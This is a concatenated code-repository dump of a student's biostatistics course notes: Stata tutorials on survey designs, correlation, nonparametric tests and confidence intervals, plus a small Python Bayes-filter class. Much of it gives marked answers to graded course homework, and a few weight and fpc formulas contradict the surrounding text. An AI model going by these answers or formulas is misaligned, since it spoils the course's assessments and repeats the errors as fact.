\n> \n> In the following tutorial, we examine how to analyze data from several different survey designs: \n\n* Simple random sampling (SRS) - We randomly sample 1,000 people.\n* Stratified Sampling - We randomly sample 250 people from each of the 4 provinces of Inventia.\n* Cluster Sampling - We randomly sample 25 districts from Inventia and randomly sample 40 people within each district.\n* Stratified Cluster sampling - Within each of the 4 provinces, we sample 5 districts and sample 50 people within each selected district.\n\n> **Discuss the advantages and disadvantages of these survey designs, considering ease of implementation, c ost, feasibility, and precision of your estimate. Which design would you do in practice?** \n> \n> This is an open-ended question, without a definitive correct answer. Please discuss your answers below on the discussion boards.\n\n#### Answer (Some thoughts (this is not a comprehensive list/answer!) ####\n> Stratified sampling protects against obtaining a bad simple random sample (e.g. by chance, sample all males); and facilitates subgroup estimation (e.g. sample equal numbers from each province by design, so that you can compare estimates between provinces). Further, if your survey is well designed and you use auxillary information, stratified sampling is the most effcient survey design, beating out simple random sampling. However, to implement stratified sampling, we need auxilliary information to increase precision (variance within strata); and need to know the population-size within each stratum. \n> \n> Cluster sampling is typically more convenient (usually way easier to implement when doing large-scale surveys than SRS or stratified sampling). However, this convenience results in a loss of efficiency (need to sample more people to obtain same precision as an SRS). 
We also need auxillary information about population size within each cluster.\n\n## Tutorial: Survey Data Analysis in Stata: Simple Random Sampling ##\n> We aim to estimate p, the prevelance of malaria, in a hypothetical country, called \"Inventia\", with four provinces and multiple districts within provinces.\n\n> **Surveys:**\n\n* Simple Random Sampling (SRS) \n* Stratified Sampling \n* Cluster Sampling \n* Stratified Cluster Sampling\n\n\n\tuse \"srs_sampling.dta\"\n\n\n> **Before analyzing, *svyset* your data!**\n\n1. What is the design of my survey?\n2. Am I using a finite population correction? At which stage of the design?\n3. What are the survey weights used in the design?\n\n### Simple Random Sampling (SRS) ###\n\n> N=pop_size=500000 \n> n=sample_size=1000 \n> p=?\n\n> q= 1000/500000 \n> w= 50000/1000 \n> f=1-n/N -> But Stata don't use it -> Look at fpc \n> fpc=final_pop_correction=n/N\n\n\tgen sample_size=1000 \n\tgen weight_srs=pop_size/sample_size \n\tgen fpc=sample_size/pop_size \n\tsvyset id [pweight = weight_srs], fpc(fpc)\n\n> Result:\n\n Parameter | Value\n-------------- | ------------\n pweight: | weight_srs\n VCE: | linearized\n Single unit: | missing\n Strata 1: | \\<one\\>\n SU 1: | id\n FPC 1: | fpc\n\n\n\tsvy: proportion malaria\n\n> Without fpc, the confidence interval is changing and the proportion of svy is the same\n\n\tsvyset id [pweight = weight_srs] \n\tsvy: proportion malaria \n\tproportion malaria\n\n> So, please use fpc and use extract the design effect: \n> deff= var(your current design) / var(SRS infinite large population)\n\n\tsvyset id [pweight = weight_srs], fpc(fpc) \n\tsvy: proportion malaria \n\testat effects, deff\n\n\tsvy, sub(if province == 1): proportion malaria\n\tsvy, sub(if province == 2): proportion malaria\n\tsvy, sub(if province == 3): proportion malaria\n\tsvy, sub(if province == 4): proportion malaria\n\n\n### Stratified Sampling ###\n\nProvince | Sample People\n-------- | --------------\n 1 | 250\n 2 | 250\n 3 | 
250\n 4 | 250\nTotal | 1000\n\n> strata=provinces \n> survey weights=?\n\n#### What's the probability of a random individual, in say,province two being selected. ####\n> For province two, it's just going to be 250 divided by the population's size of province two.\n\n> sample_size=250 \n> weight=sample_size/pop_size_of_province_2 \n> fpc=final_pop_correction=n/N\n\n\tuse \"stratified_sampling.dta \n\tgen sample_size=250 \n\tgen weight_stratified=pop_size/sample_size \n\tgen fpc_stratified=1/weight_stratified \n\tsvyset id [pweight = weight_stratified], strata(province) fpc(fpc_stratified)\n\n> Result:\n\n Parameter | Value\n-------------- | ------------\n pweight: | weight_stratified\n VCE: | linearized\n Single unit: | missing\n Strata 1: | province\n SU 1: | id\n FPC 1: | fpc_stratified\n\n\n\tsvy: proportion malaria \n\testat effects, deff\n\n> Check Oversize:\n\n\tsvy: proportion malaria, over(province)\n\ttable prov_size\n\n\n### Cluster Sampling ###\n> 2 Stage Design of a Cluster survey\n\nProvince | District |Sample People\n-------- | -------- | --------------\n 1 | 1 | 20\n 1 | 2 | 10\n 1 | 3 | 2\n 1 | .. | ..\n 2 | .. | ..\n 3 | .. | ..\n 4 | .. | ..\nTotal | 2346 | 1000\n\n> We are doing: \n> 25 districts by randomly sampling \n> 40 people/district by randomly sampling \n> fpc_I=25/146 \n> fpc_II=40/people_in_district \n> \n> P(district 4 is sampled)= ?= fpc_I \n> P(Joe | disctrict 4 is sampled)= ?= fpc_II\n\n\tuse \"cluster_sampling.dta\"\n\tgen fpc_I=25/146\n\tgen fpc_II=40/districtsize\n\n\tgen weight_cluster=(fpc_I*fpc_II)^-1\n\tsvyset district [pweight=weight_cluster], fpc(fpc_I) || id, fpc(fpc_II)\n\n\tsvy: proportion malaria\n\testat effects, deff\n\n\n### Stratified Cluster ###\n\nProvince | District |Sample People\n-------- | -------- | --------------\n 1 | 1 | 20\n 1 | 2 | 10\n 1 | 3 | 2\n 1 | 4 | ..\n 1 | 5 | ..\n 1 | .. | ..\n 2 | 1 | ..\n 2 | 2 | ..\n 2 | 3 | ..\n 2 | 4 | ..\n 2 | 5 | ..\n 2 | .. 
| ..\n 3 | 1 | ..\n 3 | 2 | ..\n 3 | 3 | ..\n 3 | 4 | ..\n 3 | 5 | ..\n 3 | .. | ..\n 4 | 1 | ..\n 4 | 2 | ..\n 4 | 3 | ..\n 4 | 4 | ..\n 4 | 5 | ..\n 4 | .. | ..\nTotal | 2346 | 1000\n\n\n\tuse \"stratifiedcluster_sampling.dta\"\n\n\n> Example: Bob lives in district 2 of province 2 \n> 5/ #district in P2 -> 50/#people in district 2 \n> is equal to 5/fpc_I -> 50/fpc_II \n> \n> weights= (fpc_I * fpc_II)^-1 \n> ndistrict= total number of districts\n\n\tgen fpc_I=5/ndistrict\n\tgen fpc_II=5/districtsize\n\n\tgen weight_stratcluster=(fpc_I*fpc_II)^-1\n\tsvyset district [pweight=weight_stratcluster], fpc(fpc_I) strata(province)|| id, fpc(fpc_II)\n\n\tsvy: proportion malaria\n\testat effects, deff\n\n## Other Aspects of Survey Design ##\n> A survey weight for a given individual is the inverse of the probability that this person is included in the survey. Survey weights are therefore a function of the sample size and the size of the population from which you sample. Think about the sampling designs we discussed in class and the definition of a survey weight to answer the questions below. \n> \n> Suppose you have a population that can be divided into different subpopulations (strata/clusters). What auxiliary information is always required to calculate survey weights for the following types of designs:\n\n#### A simple random sample? ####\n\n* => **total population size**\n* population size within strata \n* population size within clusters \n* none of the above \n\n\n#### Stratified random sample? ####\n\n* total population size \n* => **population size within strata**\n* population size within clusters \n* none of the above \n\n#### Cluster sample? ####\n\n* total population size \n* population size within strata \n* => **population size within clusters**\n* none of the above \n\n## Answer ##\n> A survey weight for individual is the inverse probability that the individual is included in the sample. 
To calculate survey weights for a simple random sample, you need to know the total population size, because the weights are defined as the total number in the sample, divided by the total population size (though everyone in the sample has the same weight, so the weights don't actually impact your analysis). For a stratified sample, the weights are defined as the sample size per strata, divided by the population size in a strata. Therefore, you need to know the population size within strata. And for a cluster sample, you need to know the population size within each cluster. \n\n\n# Examining the Results of Stata Data Analysis #\n> The results of each of the surveys are below. \n\n Survey Designs | ^p | se(^p) | 95% CI | DEFF \n------------------- | ----- | ------ | ------------- | ---- \n Truth | 0.131 | | | \n SRS | 0.128 | 0.0106 | (0.107,0.149) | 1\n Stratified | 0.131 | 0.0120 | (0.107,0.155) | 1.28\n Cluster | 0.144 | 0.0142 | (0.115,0.173) | 1.63\n Stratified Cluster | 0.155 | 0.0145 | (0.125,0.186) | 1.61\n\n> Summary of our estimate of p from each of the survey designs.\n\n* Examining these results, compare and contrast the survey designs again.\n* Stratified sampling can be more efficient than simple random sampling. Looking at the design effects, we see that this is not the case for our survey design. Why?\n* Relatedly, how might we design a stratified survey that is more efficient than the simple random sample?\n\n## Answer Some thoughts (this is not a comprehensive answer) ##\n> Recall that we designed our survey such that we sample the same number of people in each province. More efficient designs would exploit: \n\n1. the total population size in each strata, and \n2. the amount of variability in responses in each strata. \n\n> When there is more variability within strata, you should sample more people. Ideally, we would select strata that minimize the within-strata variability to gain efficiency over SRS. 
The cluster or stratified-cluster surveys might be easier to implement in practice. Looking at the design effect estimates (as well as the standard error of our estimate of malaria prevalence), it is clear that we do sacrifice some efficiency by using cluster sampling. \n\n\n# Tutorial: The Perils of Non-response #\n> Calculate p with people who came back to the test\n\n1. High responses - pA\n2. Moderate responses - pB\n3. Low responses - pC\n\n> 'proportion highchol highcholC highcholB highcholA' is using only the data which are not missing. That is the reason why Number of obs is only 58.\n\n\n\tuse \"FraminghamNonresponseExample.dta\"\n\tproportion highchol highcholC highcholB highcholA\n\n\n\tgen wA=1/pA\n\tproportion highcholA [pweight=wA]\n\n\tgen wB=1/pB\n\tproportion highcholB [pweight=wB]\n\n\tgen wC=1/pC\n\tproportion highcholC [pweight=wC]\n\n\n# Example: Big Surveys #\n> A Survey design combines many elements:\n\n* Statistics\n* Epidemiology\n* Psychology/linguistics\n* Business/management/operations\n\n## Demographic Health Surveys (AIS Survey)##\nTanzania 2007-2008 Standard AIDS Indicator Survey (THMIS 2007-08)\n\n* **Objectives** \nThe objectives gives us a lot of informations: \"the primary objectives of the 2007-08 THMIS were to provide up-to-date information on the *prevalence of HIV infection* among **Tanzanian adults** and the prevalence of *malaria infection and anaemia* among **young children**.\" - Goals: adults and young children\n* **Sampling Frame** \nPreexisting sampling frame, developed by the National Bureau of Statistics for 2002 census\n* **Sampling Design** \nMultistage cluster sampling design, enumeration areas + households\n\n### Elements of Survey Design ###\n* **Modalities** \nIn person household and individual questionairres, blood samples\n* **Content** \nHousehold information, knowledge of HIV, demographics, HIV status, anemia/malaria status for children\n* **Non-response** \nMultiple levels of non-response: household, 
individual testing\n\n### How are all of these elements of design interrelated? ###\n\n* Objectives - designed\n* Modalities - non-response\n\n\n## California Health Interview Survey 2009 (CHIS) ##\n> It is completed different from the example above. \n> CHIS is the nation's largest state health survey. CHIS is a randomdial telephone survey conducted on a contrinuous basis and covering a wide range of health topics. CHIS data gives a detailed picture of the health and health care needs of California's large and diverse population. A full CHIS data cycle takes two years to complete and surveys over 50000 Californians but continous data collection now allows CHIS to generate one-year estimates. Link: http://www.chris.ucla.edu/about.html\n\n* Stratified random sample\n* Use random digit dialing for landlines and some cell phones\n* Much lower response rates\n\n\n" }, { "alpha_fraction": 0.5339961647987366, "alphanum_fraction": 0.5368826389312744, "avg_line_length": 31.13401985168457, "blob_id": "c14ac05b8fa513dfb9cf9b5e7f11ed8a2d4227b8", "content_id": "6f4cb03afb1fabe47f37c6acf6ae502b5c76e694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3118, "license_type": "no_license", "max_line_length": 76, "num_lines": 97, "path": "/AI-Class/Algorithms-Python/BayesFilter/BayesDB.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "class BayesDB:\n\n ## **************\n ## *** Fields ***\n ## **************\n\n ## Frequency tables and related book-keeping\n wordToTotalFreq = None\n labelToWordToFreq = None\n labelToTotalWordCount = None\n uniqueWords = None\n totalWordCount = None\n uniqueWordCount = None\n\n ## Docs/Labels DB\n allDocs = None\n labelToDocs = None\n\n ## **********************\n ## *** Public Methods ***\n ## **********************\n\n def addDoc(self, doc, label):\n \"\"\"\n Adds a doc (just a string) to the DB. 
Label is optional (if this\n doc is not labelled then just pass None). Calling this method will\n update the probabilities according to the words in the document, and\n the presence/absence of a label.\n \"\"\"\n self.allDocs.append(doc)\n\n for word in doc.split():\n self.__addWord(word)\n\n if label:\n self.__labelDoc(label, doc)\n\n def info(self):\n \"\"\"\n Prints info on this DB.\n \"\"\"\n print \"Word->Total Freq: %s\" % self.wordToTotalFreq\n print \"Label->Word->Freq: %s\" % self.labelToWordToFreq\n print \"Label->Total Word Count: %s\" % self.labelToTotalWordCount\n print \"Unique Words: %s\" % self.uniqueWords\n print \"Total Word Count: %s\" % self.totalWordCount\n print \"Unique Word Count: %s\" % self.uniqueWordCount\n print\n\n ## ***********************\n ## *** Private Methods ***\n ## ***********************\n\n def __init__(self):\n self.wordToTotalFreq = {}\n self.labelToWordToFreq = {}\n self.labelToTotalWordCount = {}\n self.uniqueWords = set([])\n self.totalWordCount = 0\n self.uniqueWordCount = 0\n\n ## Docs/Labels DB\n self.allDocs = []\n self.labelToDocs = {}\n\n def __labelDoc(self, label, doc):\n ## Init label->docs if not already seen\n if label not in self.labelToDocs.keys():\n self.labelToDocs[label] = []\n self.labelToDocs[label].append(doc)\n\n for word in doc.split():\n ## Initialise label->word->freq if not already seen\n if label not in self.labelToWordToFreq.keys():\n self.labelToWordToFreq[label] = {}\n\n ## Increment word frequency for this label\n if word not in self.labelToWordToFreq[label].keys():\n self.labelToWordToFreq[label][word] = 1\n else:\n self.labelToWordToFreq[label][word] += 1\n\n ## Increment total word count for this label\n if label not in self.labelToTotalWordCount.keys():\n self.labelToTotalWordCount[label] = 1\n else:\n self.labelToTotalWordCount[label] += 1\n\n def __addWord(self, word):\n if word not in self.wordToTotalFreq:\n self.wordToTotalFreq[word] = 1\n else:\n self.wordToTotalFreq[word] += 1\n \n 
self.uniqueWords.add(word)\n self.uniqueWordCount = len(self.uniqueWords)\n self.totalWordCount += 1\n\n" }, { "alpha_fraction": 0.6104529500007629, "alphanum_fraction": 0.6439024209976196, "avg_line_length": 40.565216064453125, "blob_id": "3c6e725520e6a96a451e2890f8a6b04a5391ed58", "content_id": "57b73844c34b04d57c9b51699ac8b546b1188574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2870, "license_type": "no_license", "max_line_length": 495, "num_lines": 69, "path": "/PH207x/homework/nine/Nonparametric Tests.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Nonparametric Tests ##\n\n#### 1. Suppose we wish to test a new treatment for dry, itchy eyes. We gather a group of eye patients, and, for each patient, we randomly treat one eye with the experimental treatment and one eye with the standard treatment. The outcome, eye relief, is a continuous measure, and the distribution of the differences in eye relief between eyes is normally distributed. Suppose we want to test whether the treatment is effective at improving eye relief. Which of the following tests is valid: ####\n> **Hint1:** Continues, normally distributed and we have dependent variables\n* sign test \n* signed-rank test \n* paired t-test \n* all of the above \n\n\n#### 2. Suppose you are conducting a two-sided sign test. You have data from 8 paired samples, and you observe 1 positive sign and 7 negative signs. What is the p-value corresponding to the null hypothesis that there is no difference in median between the two groups? 
####\n\n```stata\n\tuse \"CVOS_me\"\n\tsigntest t6=t0\n```\n\n sign | observed | expected\n------------ | -------- | ---------\n positive | 1 | 4\n negative | 7 | 4\n zero | 0 | 0\n **TOTAL** | **8** | **8**\n\n```stata\nOne-sided tests:\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 > 0\n Pr(#positive >= 1) =\n Binomial(n = 8, x >= 1, p = 0.5) = 0.9961\n\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 < 0\n Pr(#negative >= 7) =\n Binomial(n = 8, x >= 7, p = 0.5) = 0.0352\n\nTwo-sided test:\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 != 0\n Pr(#positive >= 7 or #negative >= 7) =\n min(1, 2*Binomial(n = 8, x >= 7, p = 0.5)) = 0.0703\n```\n\n#### 3. Walker et al. (1987) examined the characteristics of children dying from sudden infant death syndrome. The sids.dta contains the age at death (in days) for a sample of 12 girls and 17 boys. Using an appropriate non-parametric test with a 0.05 level of significance, test whether the median age at death is the same for boys and girls. Be sure to verify the assumptions of your test. ####\n\n##### What is the absolute value of your test statistic? #####\n> **Hint1:** ABSOLUTE = NO NEGATIVE SIGN !!!! \n> **Hint2:** I did not put the test statistic in as 0.xxxx, just as .xxxx. Don't know if that will make a difference for you or not. \n> **Hint3:** You need to view/read the tutorial segment Nonparametrics for Independent Samples. \n> => **|Z|=|-0.044|=0.044**\n\n```stata\n\tuse \"sids.dta\"\n\tpwcorr Age Sex, sig\n\tspearman Age Sex\n\tranksum Age, by(Sex)\n```\n\n##### What is your p-value? #####\n> => **0.9647**\n\n\n###### Based on this test, can you conclude that we do not have enough evidence to suggest that the median age at death is different between boys and girls? ######\n* => **Yes**\n* No\n\n###### Would it be appropriate to use a two-sample t-test in this case?. 
######\n* Yes\n* => **No**\n\n\n" }, { "alpha_fraction": 0.747826099395752, "alphanum_fraction": 0.782608687877655, "avg_line_length": 18.16666603088379, "blob_id": "18fd8f5360fa7c628695b492e56c19c94dbfa949", "content_id": "7682a362bcbb0916570c3e1b34966fd565680489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 115, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/PH207x/stata/stataquest.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Type in Stata\nnet cd http://www.stata.com\nnet cd quest7\nnet install quest1\nnet install quest2\nnet install quest3\n" }, { "alpha_fraction": 0.5799848437309265, "alphanum_fraction": 0.6901693344116211, "avg_line_length": 38.949493408203125, "blob_id": "ebb783aba183601c156ba4f9813b9587e6006213", "content_id": "588b3de36bc05ad63ed730b3141a035e115533b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4019, "license_type": "no_license", "max_line_length": 287, "num_lines": 99, "path": "/PH207x/homework/six/Central Limit Theorem and Confidence Intervals.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Central Limit Theorem and Confidence Intervals #\nAccording to the WHO Global Database on Anaemia, the mean hemoglobin levels among primary school children in Delhi were estimated at μ=108 g/L, with standard deviation σ=12.5 g/L. (Source: http://who.int/vmnis/anaemia/data/database/countries/ind_ida.pdf)\n\nSuppose we took a random sample of 75 primary school children in Delhi. Denote the mean hemoglobin levels in this sample as xˉ. Throughout this question, assume that the sample size is large enough that the Central Limit Theorem is applicable and that σ is known. \n\n> μ=population= 108 g/L \n> σ=standard deviation= 12.5 g/L \n> n=sample size= 75 \n> xˉ= mean hemoglobin levels= ?\n\n1. 
According to the Central Limit Theorem, what is the expected value (mean) of xˉ?\nHints: see https://www.edx.org/static/content-harvard-id270x/handouts/JotterWeek5.390aec581f74.pdf in which it is written that as per the CLT, in the xˉdistribution μ is the mean.\nHint2: check SAMPLING DISTRIBUTIONS 10:50\n\n> x ̄ ∼ N (μ, σ/sqrt(n)) \n> x ̄ ~ N( 108, 1.4433757 ) \n> x ̄ ~ **108**\n\n\n2. According to the Central Limit Theorem, what is the standard deviation of xˉ?\nHints: The standard deviation of the sample mean is also known as standard error, see the hyperlink given in Q1.\nHint2: check SAMPLING DISTRIBUTIONS 11:04\n\nsd= σ/SQRT(n)= 12.5/sqrt(75)= **1.4433757**\n\n\n3. Suppose we take a large number of samples of size 75. What proportion of the samples would we expect to have a sample mean xˉ that lies between 106 and 110 g/L?\nHints: [106 < xbar < 110]= (110-108)/σ/sqrt(n) > Z > (106-108)/σ/sqrt(n) \nThen use di normal( value of(110-108)/σ/sqrt(n)) - normal(value of (106-108)/σ/sqrt(n))\n\n> z= (x⁻ +- μ) / ( σ/SQRT(n) ) \n> (110-108) / ( σ/SQRT(n) ) > z \n> (106-108) / ( σ/SQRT(n) ) < z\n\n\tdi normal( (110-108) / 1.4433757 ) - normal( (106-108) / 1.4433757 )\n> => **0.83414333**\n\n\n\n4. Suppose instead we repeatedly took random samples of size 25. What proportion of the samples would we expect to have a sample mean xˉ that lies between 106 and 110 g/L?\nHints: Q4 same as Q3 only the value of n is changed.\n\n> n= 25 \n> sd= 12.5/sqrt(25)= 2.5 \n> z= (x⁻ +- μ) / ( σ/SQRT(n) )\n\n\tdi normal( (110-108) / 2.5 ) - normal( (106-108) / 2.5 )\n> => **0.5762892**\n\n\n5. Again, suppose we repeatedly took samples of size 75. 
What proportion of the samples would we expect to have a mean less than xˉ=103?\nHints: Xbar < 103 = Z < (103-108)/σ/sqrt(n), then di normal(value of (103-108)/σ/sqrt(n))\nHint2: In (103-108)/σ/sqrt(n), σ = 12.5, n= 75 then di normal()\n\n> n= 75 \n> xˉ <= 103 \n> sd= 1.4433757 \n> z= (103-108)/1.4433757= -3.4641016\n\n\tdi normal( -3.4641016 )\n> => **0.000266**\n\n\n6. If we repeatedly took samples of size 75, we would expect that, in 20% of the samples, xˉ would be greater than ____?\n(Hint: Use invnormal(0.8) to find the P(Z>z∗)=1−0.8=0.2, where Z∼N(0,1).\nHint2: di invnormal(0.8)= (x bar - μ)/σ/sqrt(n) and then find the value of X bar\n\n\tdi invnormal(0.8)\n> => **0.84162123**\n\n> 0.84162123= (xˉ-108)/1.4433757 \n> => xˉ= 0.84162123*1.4433757+108= **109.21478**\n\n7. After taking a sample of size 75, we found that the sample mean was xˉ=103. Construct a 95% confidence interval for μ.\nHints: See the Confidence Interval section in https://www.edx.org/static/content-harvard-id270x/handouts/HandoutWeek5Review.2a666d8d60ca.pdf\n\n> xˉ=103 \n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n\n\tdi 103 - 1.96*1.4433757 \n\tdi 103 + 1.96*1.4433757\n\n> Lower Bound: \n> => **100.17098**\n\n> Upper Bound: \n> => **105.82902**\n\n\n8. Based on the above interval, we can say that the probability that xˉ lies in the interval is 0.95.\n\n> True \n> => False \n\n\n9. Suppose we were also interested in the mean of the highly right skewed indicator of iron absorption, ferritin. 
Compared to the relatively symmetrically distributed indicator hemoglobin, do you think a larger or smaller sample size would be required to apply the central limit theorem?\n\n> Smaller \n> => Larger \n\n" }, { "alpha_fraction": 0.7709497213363647, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 93.76470947265625, "blob_id": "99658661af0954433fef0d5ba762d2f99ea90409", "content_id": "ff88a68dcd6a5fa51037c61ce3625c70e5fcae5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1613, "license_type": "no_license", "max_line_length": 496, "num_lines": 17, "path": "/PH207x/excercises/Lesson7/Tutorial: Health Disparities Research.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Health Disparities Research #\nThe pathways between race/ethnicity, socioeconomic status, and health disparities are complex in the United States, e.g. [1, 2]. Using observational public databases like CHIS, we can investigate issues in health disparities. (However, it is important to always remember that association is not causation, and consequently we can only talk about observed associations in the dataset.) \n \nAs a simple example, we investigate the relationship between poverty-level and visiting the doctor in the past year. As in last week’s tutorial, we use a random sample of 500 respondents from the 2009 CHIS survey. (If you wish to do a more detailed analysis, you can download the entire CHIS dataset from their website.)\n\n\n### 1. Does modeling the number of people who went to the doctor using the binomial distribution seem appropriate? ###\n> => **Yes** \n> No \n\n2. This week, we stratify by poverty level. Within each of these groups, does modeling the number of people who went to the doctor using a binomial distribution seem appropriate?\n> => **Yes** \n> No \n\n\n## Solution ##\nThe binomial model is appropriate in both instances. 
For any population, there is a true proportion who goes to the doctor, and if we randomly sample from that population, we have a fixed p, fixed n, independent observations, and a binary outcome. Again, when we stratify, there is a fixed proportion of the population who goes to the doctor. So, even though we are now considering different populations, the binomial model still works, but the \"probability of success\" changes when you stratify.\n" }, { "alpha_fraction": 0.7225913405418396, "alphanum_fraction": 0.7259136438369751, "avg_line_length": 41.85714340209961, "blob_id": "7c0537fca35d9250c76024f7c5770c193ad31f76", "content_id": "1eb6ab8fdb3059730926c49290ae694a7ad82cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 602, "license_type": "no_license", "max_line_length": 160, "num_lines": 14, "path": "/PH207x/homework/four/Probability_distributions-the_big_picture.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Probability distributions: the big picture\nRecap: In the last several questions about designing a study, we have learned about properties of common probability models in statistics, namely that:\n\n##### Q1. The _______ provides a good approximation to the binomial distribution when the event of interest is rare and the study population is large. #####\n\n * **Poisson**\n * normal \n * exponential\n\n##### Q2. The _______ provides a good approximation to the binomial distribution when the event of interest is not rare and the study population is large. 
#####\n\n * Poisson\n * **normal**\n * exponential \n\n" }, { "alpha_fraction": 0.6244399547576904, "alphanum_fraction": 0.6643343567848206, "avg_line_length": 38.52912521362305, "blob_id": "cbd4343eee04155a599bb705cf8c94431ca1068c", "content_id": "5e13d1d5b50d0ca885816b496ab75b6dffbec5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 16300, "license_type": "no_license", "max_line_length": 895, "num_lines": 412, "path": "/PH207x/excercises/Lesson9/Correlation and Nonparametrics.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Correlation and Nonparametrics #\n> Links:\n\n1. http://istics.net/stat/correlations/\n2. http://data.worldbank.org\n3. http://www.google.com/publicdata/directory/\n\n\n## Pearson's Correlation Coefficient ##\n## Inference on Rho ##\n> Sampling distribution: \n> If X & Y are normally distributed and rho=0, then \n> \n> t_n-2= r/sqrt( (1-r²) / (n-2) ) \n\n### Example ###\n> r=-0.829 for DPT example \n> t= r*sqrt( (n-2) / (1-r²) ) \n> t= -0.829*sqrt( (20-2) / (1-(-0.829)^2) )= -6.29 \n> \n> versus t with 18 degrees of fredom, so p<0.001. \n> So reject J_0: rho=0\n\n```stata\n\tpwcorr diabp1 sysbp1 if _n<51 , sig\n```\n\n## Missconceptions ##\n## Spearman's Rank Correlation Coefficient ##\n> When you have any doubts about the distribution of your x's and your y's -whether they're normal or not- go with the Spearman's. \n> And now the other beauty of Spearman's is that this word linear doesn't appear here. This is truly a test for independence of these two characteristics. 
\n> Rank the Data:\n\ni | x | y | x_r | y_r | d | d²\n-------- | --- | ---- | ---- | ---- | ------ | -------\n 1 | 1.3 | 14.3 | 2 | 2 | 0 | 0\n 2 | 1.7 | 14.7 | 4 | 3 | 1 | 1\n 3 | 0.8 | 18.0 | 1 | 4 | -3 | 9\n 4 | 1.4 | 12.1 | 3 | 1 | 2 | 4\n\n> x and y are Raw Data \n> x_r and y_r are Ranks \n> d is the difference between x_r and y_r by using:\n\n\tr_s= ( 1 / (n-1) ) * n sum from 1 to n ( ( x_ri - x⁻_r ) / s_x_r ) ( ( y_ri - y⁻_r ) / s_y_r )\n\n## Tutorial: Correlation Analysis ##\n\n```stata\n\tuse \"WorldBank.dta\"\n\tpwcorr\n```\n\n> Results:\n\n | year | dpt | measles\n------------ | --------- | ------ | ----------\n year | 1.0000 | | \n dpt | 0.9476 | 1.0000 | \n measles | 0.9387 | 0.9973 | 1.0000\n\n> Alternative the follow can be used:\n\n```stata\n\tcorrelate\n```\n\n> Plot correlation:\n\n```stata\n\ttwoway (scatter measles year, sort) (scatter dpt year, sort)\n```\n\n> Remember that the **Pearson correlation coefficient** is a measure of the strength of the linear relationship between two variables. So what we're going to do is we're going to test the null hypothesis that rho is equal to zero, our correlation coefficient, against the alternative, that rho is not equal to zero. \n> H_0: p=0 \n> H_A: p != 0\n\n```stata\n\tpwcorr year measles, sig\n```\n\n> Results:\n\n | year | measles\n------------ | --------- | --------\n year | 1.0000 | \n measles | 0.9387 | 1.0000 \n | 0.0000 | \n\n\n> And what that does is it gives me the correlation coefficient in this top line. And on the bottom line, that gives me a **p value**. So what I can say here is that my p value is very small. It's less than 0.001. So in this case, I would reject my null hypothesis, and conclude that there is a positive relationship between time and measles vaccination coverage. 
p < 0.001\n\n```stata\n\tspearman year measles\n```\n\n## Another Correlation Example ##\n> In the HealthExpensesbyCountry.dta dataset, we assess temporal trends in health expenditures per capita and in number of hospital beds (per 1,000 individuals) in four countries: the United States, Great Britain, Japan, and Canada. \n> \n> However, in the following questions, we focus on the United States, but we encourage you to look at the other countries on your own! Health expenditures per capita in the United States are only available after 1995 and up until 2010. Please restrict your analysis to the years 1995-2010 for the questions below. \n> \n> Open the dataset HealthExpensesbyCountry.dta. In this question, you need to restrict to certain subsets of the data when performing your analysis. To do so, it is easiest to use \"if\" statements in Stata. For instance, to calculate the correlation beteen year and number of hospital beds in the United States between 1995 and 2010, you can type:\n\n```stata\n\tuse \"HealthExpensesbyCountry.dta\"\n\tpwcorr hospitalbeds year if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | hospit~s | year \n------------- | -------- | --------\n hospitalbeds | 1.0000 | \n year | -0.9802 | 1.0000 \n | 0.0000 | \n\n\n> (You do not need to specify that year <= 2010 because the dataset only contains data through 2010.)\n\n### Consider the following questions: ###\n####1. Do the following relationships appear linear (use scatterplots to help answer the question)?####\n> **Health expenditures per capita and year from 1995-2010 in the United States**\n* => **Yes**\n* No\n\n```stata\n\tgraph matrix healthpercapita year if country == \"United States\" & year > 1994\n```\n\n> **Number of hospital beds and year from 1995-2010 in the United States**\n* => **Yes**\n* No\n\n```stata\n\tgraph matrix hospitalbeds year if country == \"United States\" & year > 1994\n```\n\n####2. 
Calculate the Pearson correlations for:####\n> **Health expenditures per capita and year from 1995-2010 in the United States** \n> => **0.9879**\n\n```stata\n\tpwcorr year healthpercapita if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | year | healthpercapita \n--------------- | ------ | ---------------- \n year | 1.0000 | \nhealthpercapita | 0.9879 | 1.0000 \n | 0.0000 | \n\n\n> **Number of hospital beds and year from 1995-2010 in the United States** \n> => **-0.9802**\n\n```stata\n\tpwcorr year hospitalbeds if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | year | hospitalbeds \n------------ | ------- | -------------- \n year | 1.0000 | \nhospitalbeds | -0.9802 | 1.0000 \n | 0.0000 | \n\n\n####3.Based on these results (and without doing any further calculations), would you expect annual health expenditures per capita and annual number of hospital beds in the United States between 1995 and 2010 to be positively correlated, negatively correlated, or uncorrelated?####\n* positive\n* => **negative**\n* no correlation\n\n> 